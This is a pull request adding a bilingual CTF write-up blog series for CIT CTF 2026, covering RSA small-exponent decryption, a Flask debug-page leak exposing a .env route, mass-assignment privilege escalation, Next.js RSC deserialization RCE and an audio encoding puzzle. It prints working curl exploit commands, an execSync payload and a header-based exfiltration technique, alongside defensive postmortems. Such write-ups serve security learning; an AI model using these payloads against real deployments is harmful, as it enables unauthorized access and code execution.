### PR TITLE
Add `ctf/` topic and CIT CTF 2026 writeup series

### DIFF
--- a/src/content/posts/en/cit-ctf-2026-baby-exponent.mdx
+++ b/src/content/posts/en/cit-ctf-2026-baby-exponent.mdx
@@ -1,0 +1,57 @@
+---
+title: "CIT CTF 2026 · Baby Exponent: the most textbook RSA e=3"
+description: Public exponent e=3, plaintext small enough that m³ never overflowed the modulus. Integer cube root and done.
+pubDate: 2026-05-07
+tags: [CTF, cit-ctf-2026, crypto, rsa]
+series: CIT CTF 2026
+---
+
+The challenge prints three numbers:
+
+```
+n = 39753111046581583678049531864...  (768-bit)
+e = 3
+c = 21208016443347524194488872231...  (much shorter)
+```
+
+`e=3` should be a reflex trigger: either Håstad (same plaintext, multiple moduli) or **the plaintext is small enough that it never overflows the modulus**. This is the second.
+
+## Approach
+
+RSA encrypts as `c = m^e mod n`. When `m^e < n`, the `mod n` step is a no-op and `c = m^e` is an integer equation. Recover `m` by taking the integer `e`-th root of `c`. The plaintext bytes fall out.
+
+`n` is 768 bit; `c` is barely 268 bit. Clearly `c << n`. The plaintext lands somewhere around 26–27 bytes — exactly the right size for a flag wrapped in `CIT{...}`. Cube-root straight away.
+
+## Solver
+
+```python
+from gmpy2 import iroot
+
+n = 39753111046581583678049531864...
+e = 3
+c = 21208016443347524194488872231...
+
+m, exact = iroot(c, 3)
+print("exact:", exact)
+print("m:", m)
+if exact:
+    mi = int(m)
+    b = mi.to_bytes((mi.bit_length() + 7) // 8, "big")
+    print("bytes:", b)
+```
+
+`gmpy2.iroot(c, 3)` returns `(root, is_exact_root)`. Here `exact=True`, confirming `m³ == c` exactly — no overflow.
+
+```
+exact: True
+m: 27680038115913774460198308299617031311839022658531567335298462333
+bytes: b'CIT{sm4ll_3xp0n3nt_g0_brrr}'
+```
+
+`CIT{sm4ll_3xp0n3nt_g0_brrr}`
+
+## Postmortem
+
+- `e=3` is one of the evergreen RSA foot-guns. "Small exponent + short plaintext + no padding" hands you the flag.
+- Real-world fix: use a larger public exponent like `e=65537` and randomize with OAEP. After OAEP, `m + r` reaches close to the bit-width of `n` and the root attack stops working.
+- In CTFs, if `e` is small enough to fit on a single hand — `2, 3, 5, 7` — try this first: integer `e`-th root and check for exact. If not exact, walk the chain: Håstad → Coppersmith → Wiener.

--- a/src/content/posts/en/cit-ctf-2026-debug-disaster.mdx
+++ b/src/content/posts/en/cit-ctf-2026-debug-disaster.mdx
@@ -1,0 +1,61 @@
+---
+title: "CIT CTF 2026 · Debug Disaster: a leaky debug page and a forgotten route"
+description: Flask debug=True leaks more than tracebacks — it leaked the source code of a forgotten route that dumps .env in cleartext.
+pubDate: 2026-05-10
+tags: [CTF, cit-ctf-2026, web, flask]
+series: CIT CTF 2026
+---
+
+import Callout from '../../../components/Callout.astro';
+
+The challenge description tells you both halves of the bug:
+
+> Developing this application is tough, and I needed debug mode to be enabled... but I'm nervous I forgot to turn it off in production. I also think I may have forgot to remove something from the application structure.
+
+"Forgot to turn off debug" and "forgot to remove something" map directly to the two stages of the exploit.
+
+## Approach
+
+With Flask `debug=True` enabled, any unhandled exception renders Werkzeug's interactive traceback page — source code included. Trip an exception:
+
+```bash
+curl -sS http://23.179.17.92:5002/admin > /tmp/debug.html
+```
+
+The `/admin` handler raises directly. The traceback exposes a slice of `/app/app.py`:
+
+```python
+@app.route("/admin")
+def admin():
+    raise Exception("Debug leak triggered: Dirbuster maybe in your future!")
+
+@app.route("/flg_bar")
+def env():
+    return open(".env").read(), 200, {"Content-Type": "text/plain"}
+```
+
+The second half — "something I forgot to remove" — is a route at `/flg_bar` that returns `.env` verbatim.
+
+<Callout type="info">
+  The two hints are separate. The debug page alone doesn't give you the flag. The value of the debug page is that it leaks source code you wouldn't otherwise see, and that source code reveals the `/flg_bar` route.
+</Callout>
+
+## Exploit
+
+```bash
+curl -sS http://23.179.17.92:5002/flg_bar
+```
+
+```
+SECRET_KEY=supersecret
+FLAG=CIT{H1dd3n_D1r5_3v3rywh3r3}
+DATABASE_URL=sqlite:///prod.db
+```
+
+`CIT{H1dd3n_D1r5_3v3rywh3r3}`
+
+## Postmortem
+
+- Werkzeug debug mode leaking into production is one of those evergreen OWASP entries — they've stopped bothering to file new CVEs for it.
+- "Forgotten routes" are a real-world failure mode. Plenty of internal-only routes (`/healthz`, `/debug/env`, `/admin/_internal`) live in the same codebase as public ones and are gated by env vars. When the env var flips wrong in production, the gate itself becomes the attack surface.
+- For your own Flask apps, keep `.env` out of the web root — drop it under `/etc/` or a parent directory, and have `python-dotenv` read it once at startup.

--- a/src/content/posts/en/cit-ctf-2026-dog-barking.mdx
+++ b/src/content/posts/en/cit-ctf-2026-dog-barking.mdx
@@ -1,0 +1,60 @@
+---
+title: "CIT CTF 2026 · Dog Barking: three bark durations, one custom encoding"
+description: 78 seconds of dog barks. Three distinct bark durations encode bit 0, bit 1, and the byte separator. Not Morse — a custom code.
+pubDate: 2026-05-06
+tags: [CTF, cit-ctf-2026, misc, audio]
+series: CIT CTF 2026
+---
+
+The attachment is a single `challenge.wav`. The description says:
+
+> I recorded this audio at the dogpark the other day and I think the dogs were trying to tell me something???
+
+A listen confirms it: a stream of crisp barks at near-uniform spacing.
+
+## Reconnaissance
+
+```bash
+$ file challenge.wav
+challenge.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM,
+               16 bit, mono 16000 Hz
+```
+
+Mono 16 kHz, ~78 s. The waveform shows pulses with similar amplitude and near-uniform silence between them. Morse comes to mind, but the silence gaps are too uniform — Morse needs at least two distinct silence widths (intra-character vs inter-character). The information is almost certainly in **bark duration** instead.
+
+## Finding the encoding
+
+Threshold a 20 ms moving-average envelope, segment each bark, measure durations. Histogram them:
+
+| duration | count |
+|---:|---:|
+| 0.098 s | 109 |
+| 0.112 s | 29 |
+| 0.155 s | 131 |
+
+Three clearly distinct durations. The natural split:
+
+- **short (0.098 s) → bit `0`**
+- **long  (0.155 s) → bit `1`**
+- **medium (0.112 s) → byte separator**
+
+The counts fit: 109 + 131 ≈ 240 bits, exactly 30 bytes; 29 medium barks are exactly the right number of separators between 30 bytes.
+
+## Decoding
+
+Split the bit stream on each medium bark — runs of exactly 8 bits, one byte each. Convert to ASCII:
+
+```bash
+$ python3 solve.py
+CIT{b4rking_up_th3_wr0ng_tr33}
+```
+
+`solve.py` lives in the repo. The pipeline is just envelope → threshold → duration histogram → split on separators → ASCII.
+
+`CIT{b4rking_up_th3_wr0ng_tr33}`
+
+## Postmortem
+
+- The "three distinct durations" reading is the whole challenge. The histogram does the work. The hard step in Misc audio is usually *what to measure*, not how to compute.
+- Custom encodings like this are common in Misc / Steganography. Heuristic: **if the raw signal discretizes into N distinct values, the payload is hiding in the arrangement of those N values**.
+- If a challenge is actually Morse rather than a custom code, look for **two** silence widths (intra-character vs inter-character). Use that as your "is this Morse?" anchor.

--- a/src/content/posts/en/cit-ctf-2026-mass-assignment.mdx
+++ b/src/content/posts/en/cit-ctf-2026-mass-assignment.mdx
@@ -1,0 +1,63 @@
+---
+title: "CIT CTF 2026 · A Massive Problem: mass assignment via dict.update"
+description: The challenge name spells it out. At register time, record.update(incoming) lets the role field in the request body overwrite the hard-coded default.
+pubDate: 2026-05-09
+tags: [CTF, cit-ctf-2026, web, flask]
+series: CIT CTF 2026
+---
+
+> Improper Authorization has been fixed! I think we are ready for production!
+
+The challenge name *A **Mass**ive Problem* literally spells out **Mass Assignment**. The description says they fixed "improper authorization" — and the new bug is a different flavor of the same family. Standard CTF setup.
+
+## Where the bug lives
+
+In the attachment, `/api/register` in `app/app.py` looks like this:
+
+```python
+record = {
+    'username': username,
+    'password': password,
+    'role': 'standard',
+    'full_name': full_name,
+    'title': title,
+    'team': team,
+}
+record.update(incoming)          # ← user-controlled JSON overwrites defaults
+if not record.get('username') or not record.get('password') or not record.get('role'):
+    return jsonify({'error': 'Unable to create account.'}), 400
+conn.execute(
+    'insert into users ... values (?, ?, ?, ?, ?, ?) '
+    'on conflict(username) do update set ...',
+    (record['username'], record['password'], record['role'], ...)
+)
+```
+
+Textbook mass assignment. `record` is initialized with `role='standard'`, then `record.update(incoming)` lets any field from the request body (including `role`) overwrite the default.
+
+## Exploit
+
+Register with `role=admin`, log in, hit `/admin` for the flag.
+
+```bash
+# 1. Register as admin
+curl -sS -c /tmp/amp.cookies -X POST http://23.179.17.92:5556/api/register \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"pwnjack","password":"Aa1!aaaa","full_name":"x","title":"x","team":"x","role":"admin"}'
+
+# 2. Log in for the session cookie
+curl -sS -c /tmp/amp.cookies -b /tmp/amp.cookies -X POST http://23.179.17.92:5556/api/login \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"pwnjack","password":"Aa1!aaaa"}'
+
+# 3. Pull /admin
+curl -sS -b /tmp/amp.cookies http://23.179.17.92:5556/admin | grep -oE 'CIT\{[^}]+\}'
+```
+
+`CIT{M@ss_@ssignm3nt_Pr1v3sc}`
+
+## Postmortem
+
+- "Update first, validate later" is the heart of this bug. Schema validation has to run *before* the `update` — better still, never deserialize a "whole record" from the request body at all.
+- Modern frameworks solve this with **allowlisted serializers**: Pydantic's `model_dump(include=...)`, Django `Form`s, Rails `strong_parameters`, Go's tagged struct mappers — all the same idea.
+- The SQL column order is pinned in the insert, which limits the blast radius to the three columns that are read back. If the code instead did something lazy like `INSERT ... SELECT * FROM (VALUES (record))`, even `created_at` would be overwritable.

--- a/src/content/posts/en/cit-ctf-2026-overview.mdx
+++ b/src/content/posts/en/cit-ctf-2026-overview.mdx
@@ -1,0 +1,33 @@
+---
+title: "CIT CTF 2026: a few writeups worth keeping"
+description: I played CIT CTF 2026 over the holiday — this is the index post for a short series of writeups covering Web, Crypto and Misc challenges.
+pubDate: 2026-05-11
+tags: [CTF, cit-ctf-2026, web, crypto, misc]
+series: CIT CTF 2026
+---
+
+import Callout from '../../../components/Callout.astro';
+
+Played [CIT CTF 2026](https://ctf.cyber-cit.club/) over the May holiday. Difficulty was friendly for entry-to-mid-tier players — Web leaned on "real" CVEs, Crypto leaned on textbook footguns, Misc leaned on lateral thinking. Good shape for writeups. This post indexes the five I'm bothering to write up.
+
+Challenge files and `solve.py` scripts live under `cit-ctf-2026/` in [jack0pan/ctf](https://github.com/jack0pan/ctf).
+
+## Posts in this series
+
+- [Debug Disaster — Flask debug page plus a forgotten `.env` route](/en/posts/cit-ctf-2026-debug-disaster/)
+- [A Massive Problem — mass assignment via `dict.update`](/en/posts/cit-ctf-2026-mass-assignment/)
+- [Server Components — RCE in Next.js 15 RSC deserialization](/en/posts/cit-ctf-2026-server-components/)
+- [Baby Exponent — the most textbook RSA `e=3` attack](/en/posts/cit-ctf-2026-baby-exponent/)
+- [Dog Barking — three bark durations on the audio track](/en/posts/cit-ctf-2026-dog-barking/)
+
+## A few meta-tips
+
+<Callout type="info">
+  On Web challenges, look in the attachment for a `package.json` / `requirements.txt` / `Dockerfile` first. Version strings frequently map to a single CVE.
+</Callout>
+
+- **Read the challenge name.** CIT titles often *are* the vulnerability keyword. *A **Mass**ive Problem* is mass assignment. *Debug Disaster* is the debug page. *Brainiac* is Brainfuck.
+- **Read the attachment structure.** The `Dockerfile` usually tells you whether the flag sits at a known path (so RCE is enough) or somewhere inside the web root (so file disclosure is enough).
+- **Read the dependency versions.** Framework version pinned to "the last six months" + the published CVE list. Server Components was solved this way.
+
+Detail per post. Each one puts *why this works* at the top and the copy-paste payload at the bottom.

--- a/src/content/posts/en/cit-ctf-2026-server-components.mdx
+++ b/src/content/posts/en/cit-ctf-2026-server-components.mdx
@@ -1,0 +1,70 @@
+---
+title: "CIT CTF 2026 · Server Components: RCE via Next.js 15 RSC deserialization"
+description: package.json pins next@15.0.4 — squarely inside the window for this year's React Server Components deserialization RCE.
+pubDate: 2026-05-08
+tags: [CTF, cit-ctf-2026, web, nextjs, cve]
+series: CIT CTF 2026
+---
+
+import Callout from '../../../components/Callout.astro';
+
+The challenge name is *Server Components* and the attachment ships a full Next.js project. `package.json` pins the version:
+
+```json
+"next": "15.0.4",
+"react": "19.0.0"
+```
+
+Next.js 15.0.4 + App Router + React Server Components. That version sits squarely inside the window for **CVE-2025-55182 / CVE-2025-66478** — RSC payload deserialization leading to RCE. From the Dockerfile:
+
+```dockerfile
+RUN mkdir -p /opt && echo 'CIT{test_flag}' > /opt/flag.txt
+```
+
+The flag is outside the web root, which is the author saying "you must RCE — file disclosure alone won't get you the flag".
+
+<Callout type="info">
+  The Web-CTF fingerprint trio: `package.json` / `requirements.txt` / `Dockerfile`. The first two pin framework + version, the third tells you where the flag lives. With all three lined up, the rest is mostly transcribing a public PoC.
+</Callout>
+
+## How the bug works (compressed)
+
+The RSC wire format lets strings reference other chunks' inner properties via `$N:path:to:prop`. When the parser handles a `resolved_model` chunk's `_response` object, it never validates whether `_prefix` / `_formData.get` are user-controllable.
+
+Setting the `then` field to `$N:__proto__:then` walks the runtime up the prototype chain to `Object.prototype.then`. A couple of property rebinds later, `_prefix` is passed into `Function(_prefix)` — arbitrary JS execution.
+
+Standard payload from there:
+
+```js
+require('child_process').execSync('cat /opt/flag.txt')
+```
+
+Exfil channel: the canonical trick is to throw `NEXT_REDIRECT` deliberately, stash the payload in the `digest` URL, and let the server copy it into the `X-Action-Redirect` response header — base64-encoded command output is echoed back verbatim.
+
+## Exploit
+
+`exploit.py` follows the public PoC structure:
+
+- `Next-Action` + `X-Nextjs-Request-Id` headers to mimic a Server Action request.
+- `name="0"` in the multipart body is the fake `resolved_model` carrying the `_prefix` payload.
+- The payload runs `execSync`, base64-encodes the output, then throws `NEXT_REDIRECT`.
+- `name="1"`..`"N"` slots are filled with `null`; the final one is `"$@0"` to trigger the reference into chunk 0.
+
+```bash
+cd Web-ServerComponents
+uv run python exploit.py http://23.179.17.92:5555 'cat /opt/flag.txt'
+```
+
+```
+[status 303] X-Action-Redirect: NEXT_REDIRECT;push;/login?a=Q0lUe1IzYUNUXzFzX1Z1MW4zckBibDN9...
+--- output ---
+CIT{R3aCt_1s_Vu1n3r@bl3}
+```
+
+`CIT{R3aCt_1s_Vu1n3r@bl3}`
+
+## Postmortem
+
+- "Framework version + last six months of CVEs" is the fastest path on Web challenges. React 19 RSC went GA late last year and the early-year deserialization issues blanket a lot of CTF mileage.
+- For real Next.js deployments, stay on the latest 15.0.x patch and don't toggle the "bypass ESM lockdown" flag. Vercel's defaults are typically OK; self-hosted containers are where the foot-guns hide.
+- The class of bugs is "the serializer treats strings inside the payload as instructions". RSC, Astro Server Islands, Remix deferred loaders all share the abstraction — expect more of this class for another year or two.

--- a/src/content/posts/zh/cit-ctf-2026-baby-exponent.mdx
+++ b/src/content/posts/zh/cit-ctf-2026-baby-exponent.mdx
@@ -1,0 +1,57 @@
+---
+title: "CIT CTF 2026 · Baby Exponent：e=3 的最朴素 RSA 利用"
+description: 公开指数 e=3，明文小到 m³ 没溢出 modulus，直接整数开三次方就能拿到。
+pubDate: 2026-05-07
+tags: [CTF, cit-ctf-2026, crypto, rsa]
+series: CIT CTF 2026
+---
+
+题面给得很干净：
+
+```
+n = 39753111046581583678049531864...（768 bit）
+e = 3
+c = 21208016443347524194488872231...（很短）
+```
+
+`e=3` 看到就该有反射：要么 Håstad（多组同明文不同 modulus），要么 **明文太小，根本没溢出 modulus**。这题是第二种。
+
+## 思路
+
+RSA 加密就是 `c = m^e mod n`。当 `m^e < n` 时，`mod n` 这步不起作用，`c = m^e` 直接成立。这时候只要对 `c` 整数开 `e` 次方就能拿到 `m`，flag 明文随之而出。
+
+`n` 长 768 bit，`c` 长度不到 268 bit，明显 `c << n`。`m` 大概 26~27 字节宽——刚好够装一句话 + flag 格式 `CIT{...}`。直接开三次方。
+
+## 求解
+
+```python
+from gmpy2 import iroot
+
+n = 39753111046581583678049531864...
+e = 3
+c = 21208016443347524194488872231...
+
+m, exact = iroot(c, 3)
+print("exact:", exact)
+print("m:", m)
+if exact:
+    mi = int(m)
+    b = mi.to_bytes((mi.bit_length() + 7) // 8, "big")
+    print("bytes:", b)
+```
+
+`gmpy2.iroot(c, 3)` 返回 `(root, is_exact_root)`。这里 `exact=True`，意味着 `m³ == c`，证明确实没溢出。
+
+```
+exact: True
+m: 27680038115913774460198308299617031311839022658531567335298462333
+bytes: b'CIT{sm4ll_3xp0n3nt_g0_brrr}'
+```
+
+`CIT{sm4ll_3xp0n3nt_g0_brrr}`
+
+## 复盘
+
+- `e=3` 是 RSA 最经典的几个坑之一。「小指数 + 短明文 + 无填充」三合一就直接送 flag。
+- 工程上修法：用 `e=65537` 这种较大的公开指数，加 OAEP 之类的随机化填充。`m + r` 经过 OAEP 之后长度就接近 `n` 的 bit-width 了，开方法直接失效。
+- CTF 里看到任何 `e` 小到「2、3、5、7」这种数字，几乎都可以试一遍：先开 `e` 次方看 exact 不 exact；不 exact 的话查 Håstad / Coppersmith / Wiener 这条链。

--- a/src/content/posts/zh/cit-ctf-2026-debug-disaster.mdx
+++ b/src/content/posts/zh/cit-ctf-2026-debug-disaster.mdx
@@ -1,0 +1,61 @@
+---
+title: "CIT CTF 2026 · Debug Disaster：调试页带出的 .env 路由"
+description: Flask debug=True 暴露的不只是 traceback，把 .env 原文吐出来的路由也跟着一起进来了。
+pubDate: 2026-05-10
+tags: [CTF, cit-ctf-2026, web, flask]
+series: CIT CTF 2026
+---
+
+import Callout from '../../../components/Callout.astro';
+
+题目描述把所有提示都告诉你了：
+
+> Developing this application is tough, and I needed debug mode to be enabled... but I'm nervous I forgot to turn it off in production. I also think I may have forgot to remove something from the application structure.
+
+「忘了关 debug」「忘了删点东西」——这两句对应的就是这道题的两段利用。
+
+## 思路
+
+Flask 的 `debug=True` 一打开，未处理异常就会渲染 Werkzeug 的交互式 traceback 页面，里面带源码。先随便找个路由触发异常：
+
+```bash
+curl -sS http://23.179.17.92:5002/admin > /tmp/debug.html
+```
+
+`/admin` 的 handler 直接抛了一个异常，traceback 里能看到 `/app/app.py` 的源码片段：
+
+```python
+@app.route("/admin")
+def admin():
+    raise Exception("Debug leak triggered: Dirbuster maybe in your future!")
+
+@app.route("/flg_bar")
+def env():
+    return open(".env").read(), 200, {"Content-Type": "text/plain"}
+```
+
+第二段就是「忘记删掉的东西」——一个把 `.env` 原样吐出去的路由 `/flg_bar`。
+
+<Callout type="info">
+  这道题的两段提示其实是分开的。光看到 debug 页拿不到 flag，必须配合源码里漏出来的 `/flg_bar` 路由。Werkzeug debug 页的价值在于「让你读到原本不会公开的源码」。
+</Callout>
+
+## 利用
+
+```bash
+curl -sS http://23.179.17.92:5002/flg_bar
+```
+
+```
+SECRET_KEY=supersecret
+FLAG=CIT{H1dd3n_D1r5_3v3rywh3r3}
+DATABASE_URL=sqlite:///prod.db
+```
+
+`CIT{H1dd3n_D1r5_3v3rywh3r3}`
+
+## 复盘
+
+- Werkzeug debug 模式在生产环境长期是个反复出现的 OWASP top 10 入口，CVE 编号都懒得发新的了。
+- 「忘删的路由」是个挺有意思的设计模式：很多公司内部把 `/healthz`、`/debug/env`、`/admin/_internal` 这种东西塞进同一份代码，靠环境变量切开关。一旦在生产忘记关，开关本身就是攻击面。
+- 自己写 Flask 时，`.env` 那种东西别放 web root 同级，至少塞到 `/etc/` 或者父目录里，再用 `python-dotenv` 在启动时读一次。

--- a/src/content/posts/zh/cit-ctf-2026-dog-barking.mdx
+++ b/src/content/posts/zh/cit-ctf-2026-dog-barking.mdx
@@ -1,0 +1,60 @@
+---
+title: "CIT CTF 2026 · Dog Barking：三种长度的狗叫"
+description: 一段 78 秒的狗叫音频，三种 bark 时长分别对应比特 0、比特 1 和字节分隔符。不是摩斯，是自创编码。
+pubDate: 2026-05-06
+tags: [CTF, cit-ctf-2026, misc, audio]
+series: CIT CTF 2026
+---
+
+题目附了一个 `challenge.wav`，描述：
+
+> I recorded this audio at the dogpark the other day and I think the dogs were trying to tell me something???
+
+听一下确实是一连串清晰的「汪汪汪」，间隔很整齐。
+
+## 先做侦察
+
+```bash
+$ file challenge.wav
+challenge.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM,
+               16 bit, mono 16000 Hz
+```
+
+单声道 16 kHz，~78 秒。波形看起来是一串能量包络相近的脉冲，每只「汪」之间有几乎一致的静音间隔。先想到摩斯，但每个静音都一样长——摩斯需要至少两种间隔（点内 vs 字符间）。换个方向：编码可能在 **每个 bark 的时长**上。
+
+## 找规律
+
+写一段 20 ms 滑动窗的能量包络，过门限切分，得到每个 bark 的起止时间。把所有 bark 时长画直方图：
+
+| 时长 | 出现次数 |
+|---:|---:|
+| 0.098 s | 109 |
+| 0.112 s | 29 |
+| 0.155 s | 131 |
+
+三种长度，截然不同。两种自然的解释：
+
+- **短（0.098 s） → bit `0`**
+- **长（0.155 s） → bit `1`**
+- **中（0.112 s） → byte 分隔符**
+
+数量也对得上：109+131 ≈ 240 个比特，刚好 30 字节；中等时长 29 个，正好是 30 字节之间的 29 个分隔符。
+
+## 解码
+
+按中等时长切分 bit 流，每段恰好 8 个 bit，转成 ASCII：
+
+```bash
+$ python3 solve.py
+CIT{b4rking_up_th3_wr0ng_tr33}
+```
+
+完整 `solve.py` 在仓库里。核心就是「envelope → threshold → 时长分类 → 按分隔符切 → ASCII」这条流水线。
+
+`CIT{b4rking_up_th3_wr0ng_tr33}`
+
+## 复盘
+
+- 「三种时长」是这道题的关键信号——只要画一次直方图，整道题就解开了。Misc 类题最难的反而是「我该测量什么」，而不是「会不会算」。
+- 这类「自创编码」在 Misc / Steganography 里非常常见。判断标准就一条：**如果原始信号能离散化成几种值，那有效信号就藏在这几种值的排列里**。
+- 如果题目用真摩斯而不是这种自创编码，那应该有 **两种**间隔（点划之间 vs 字符之间）。把这个特征作为「这是不是摩斯」的判断锚点。

--- a/src/content/posts/zh/cit-ctf-2026-mass-assignment.mdx
+++ b/src/content/posts/zh/cit-ctf-2026-mass-assignment.mdx
@@ -1,0 +1,63 @@
+---
+title: "CIT CTF 2026 · A Massive Problem：dict.update 撑起的越权"
+description: 题目名直接拼出 Mass Assignment。register 时 record.update(incoming) 让请求体里的 role 字段把服务端写死的默认值盖掉。
+pubDate: 2026-05-09
+tags: [CTF, cit-ctf-2026, web, flask]
+series: CIT CTF 2026
+---
+
+> Improper Authorization has been fixed! I think we are ready for production!
+
+题目名 *A **Mass**ive Problem* 直接拼出 Mass Assignment。修了「Improper Authorization」却又开了另一个洞——这种 hint 在 Web 题里几乎是标准模板。
+
+## 漏洞定位
+
+附件里 `app/app.py` 的 `/api/register` 长这样：
+
+```python
+record = {
+    'username': username,
+    'password': password,
+    'role': 'standard',
+    'full_name': full_name,
+    'title': title,
+    'team': team,
+}
+record.update(incoming)          # ← 用户提交的 JSON 会覆盖上面的默认值
+if not record.get('username') or not record.get('password') or not record.get('role'):
+    return jsonify({'error': 'Unable to create account.'}), 400
+conn.execute(
+    'insert into users ... values (?, ?, ?, ?, ?, ?) '
+    'on conflict(username) do update set ...',
+    (record['username'], record['password'], record['role'], ...)
+)
+```
+
+典型的 Mass Assignment：先用写死的 `role='standard'` 初始化 `record`，紧接着 `record.update(incoming)` 让请求体里的任意字段（包括 `role`）覆盖默认值。
+
+## 利用
+
+注册时把 `role` 改成 `admin`，然后用它登录，访问 `/admin` 拿 flag。
+
+```bash
+# 1. 以 admin 角色注册
+curl -sS -c /tmp/amp.cookies -X POST http://23.179.17.92:5556/api/register \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"pwnjack","password":"Aa1!aaaa","full_name":"x","title":"x","team":"x","role":"admin"}'
+
+# 2. 登录拿 session
+curl -sS -c /tmp/amp.cookies -b /tmp/amp.cookies -X POST http://23.179.17.92:5556/api/login \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"pwnjack","password":"Aa1!aaaa"}'
+
+# 3. 读取 /admin 上的 flag
+curl -sS -b /tmp/amp.cookies http://23.179.17.92:5556/admin | grep -oE 'CIT\{[^}]+\}'
+```
+
+`CIT{M@ss_@ssignm3nt_Pr1v3sc}`
+
+## 复盘
+
+- 「先 update 再校验」是这个洞的关键。Schema 校验一定要发生在 `update` 之前——更进一步，根本就不要从用户请求体里反序列化「整个 record」。
+- 现代框架里这类问题的根治方法是 **白名单序列化器**：Pydantic 的 `model_dump(include=...)`、Django 的 `Form`、Rails 的 `strong_parameters`、Go 的 `tag struct mapping` 都是同一类思路。
+- 题目里 SQL 语句的字段顺序写死，所以 `username/password/role` 三件套被显式取出来；如果改成 `INSERT ... SELECT * FROM (VALUES (record))` 这种偷懒写法，攻击面会再大一圈，连 `created_at` 都能被覆盖。

--- a/src/content/posts/zh/cit-ctf-2026-overview.mdx
+++ b/src/content/posts/zh/cit-ctf-2026-overview.mdx
@@ -1,0 +1,33 @@
+---
+title: "CIT CTF 2026：几道印象深的题"
+description: 五一假期跟着打了 CIT CTF 2026，把 Web / Crypto / Misc 几道题的解题思路整理成系列。这篇是入口。
+pubDate: 2026-05-11
+tags: [CTF, cit-ctf-2026, web, crypto, misc]
+series: CIT CTF 2026
+---
+
+import Callout from '../../../components/Callout.astro';
+
+五一假期跟着 [CIT CTF 2026](https://ctf.cyber-cit.club/) 打了几天。题目难度对入门到中端选手挺友好，Web 偏「真实漏洞」、Crypto 偏「教科书坑」、Misc 偏脑洞，整体写起来比较出 writeup。这里挑了印象最深的几道整理成一个小系列。
+
+题源和 `solve.py` 都在仓库 [jack0pan/ctf](https://github.com/jack0pan/ctf) 的 `cit-ctf-2026/` 目录下。
+
+## 这个系列里要写的题
+
+- [Debug Disaster — Flask debug 调试页加忘记删的 `.env` 路由](/posts/cit-ctf-2026-debug-disaster/)
+- [A Massive Problem — `dict.update` 撑起的越权](/posts/cit-ctf-2026-mass-assignment/)
+- [Server Components — Next.js 15 RSC 反序列化 RCE](/posts/cit-ctf-2026-server-components/)
+- [Baby Exponent — `e=3` 的最朴素 RSA 利用](/posts/cit-ctf-2026-baby-exponent/)
+- [Dog Barking — 三种长度的狗叫](/posts/cit-ctf-2026-dog-barking/)
+
+## 几条挑题心得
+
+<Callout type="info">
+  Web 题先看附件里有没有 `package.json` / `requirements.txt` / `Dockerfile`，版本号经常直接对应一个 CVE。
+</Callout>
+
+- **看题目名**。CIT 的题目名很多直接是漏洞关键词。*A **Mass**ive Problem* 就是 Mass Assignment，*Debug Disaster* 就是 debug 页面，*Brainiac* 就是 Brainfuck。
+- **看附件结构**。`Dockerfile` 经常告诉你 flag 在哪个路径，意味着「能 RCE 就能拿 flag」还是「直接读 web root」。
+- **看依赖版本**。框架版本号 + 「最近 6 个月」的 CVE 列表，套出来就赢一半。Server Components 那道就是这么解掉的。
+
+具体的题往后看就行。每篇都把「**为什么这么解**」放在前面，复制粘贴的 payload 放在后面。

--- a/src/content/posts/zh/cit-ctf-2026-server-components.mdx
+++ b/src/content/posts/zh/cit-ctf-2026-server-components.mdx
@@ -1,0 +1,70 @@
+---
+title: "CIT CTF 2026 · Server Components：Next.js 15 RSC 反序列化 RCE"
+description: 附件里 package.json 钉死 next@15.0.4，刚好命中今年披露的 RSC 反序列化漏洞。
+pubDate: 2026-05-08
+tags: [CTF, cit-ctf-2026, web, nextjs, cve]
+series: CIT CTF 2026
+---
+
+import Callout from '../../../components/Callout.astro';
+
+这道题的题面叫 *Server Components*，附件给了完整 Next.js 项目。`package.json` 一眼就把答案钉死：
+
+```json
+"next": "15.0.4",
+"react": "19.0.0"
+```
+
+Next.js 15.0.4 + App Router + React Server Components。这个版本正好覆盖 **CVE-2025-55182 / CVE-2025-66478** —— RSC payload 反序列化导致的 RCE。Dockerfile 里：
+
+```dockerfile
+RUN mkdir -p /opt && echo 'CIT{test_flag}' > /opt/flag.txt
+```
+
+flag 在 web root 之外，意思就是「必须 RCE，不能光靠任意文件读取」。
+
+<Callout type="info">
+  CTF 里 Web 题的「指纹三件套」：`package.json` / `requirements.txt` / `Dockerfile`。前两个告诉你框架和版本，第三个告诉你 flag 在哪。三个一对齐，剩下就是抄 PoC。
+</Callout>
+
+## 漏洞原理（简化版）
+
+RSC 的 wire format 允许字符串以 `$N:path:to:prop` 这种形式去引用其它 chunk 内部的属性。解析器在处理 `resolved_model` chunk 的 `_response` 对象时，没有校验 `_prefix` / `_formData.get` 这些内部字段能不能由用户控制。
+
+把 `then` 字段解析成 `$N:__proto__:then` 就能让 runtime 沿原型链跳到 `Object.prototype.then`，再经过几次属性重绑把 `_prefix` 字符串嗂进 `Function(_prefix)`，相当于拿到任意 JS 执行。
+
+剩下的就是常规 RCE：
+
+```js
+require('child_process').execSync('cat /opt/flag.txt')
+```
+
+输出怎么带回来？这个漏洞的惯用技巧是**主动抛 `NEXT_REDIRECT` 错误**，把 payload 放进 `digest` 字段里那个 URL 上，服务端会把它复制到响应的 `X-Action-Redirect` 头里——这样命令输出 base64 编码后会原样回显。
+
+## 利用
+
+直接照公开 PoC 写一个 `exploit.py`，关键点：
+
+- `Next-Action` + `X-Nextjs-Request-Id` 等 header 模拟 Server Action 请求；
+- multipart body 里 `name="0"` 是伪造的 resolved_model，带 `_prefix` 载荷；
+- `_prefix` 先用 `execSync` 取命令输出，base64 之后抛 `NEXT_REDIRECT`；
+- `name="1"`..`"N"` 塞 `null`，最后一份塞 `"$@0"` 触发对 chunk 0 的引用。
+
+```bash
+cd Web-ServerComponents
+uv run python exploit.py http://23.179.17.92:5555 'cat /opt/flag.txt'
+```
+
+```
+[status 303] X-Action-Redirect: NEXT_REDIRECT;push;/login?a=Q0lUe1IzYUNUXzFzX1Z1MW4zckBibDN9...
+--- output ---
+CIT{R3aCt_1s_Vu1n3r@bl3}
+```
+
+`CIT{R3aCt_1s_Vu1n3r@bl3}`
+
+## 复盘
+
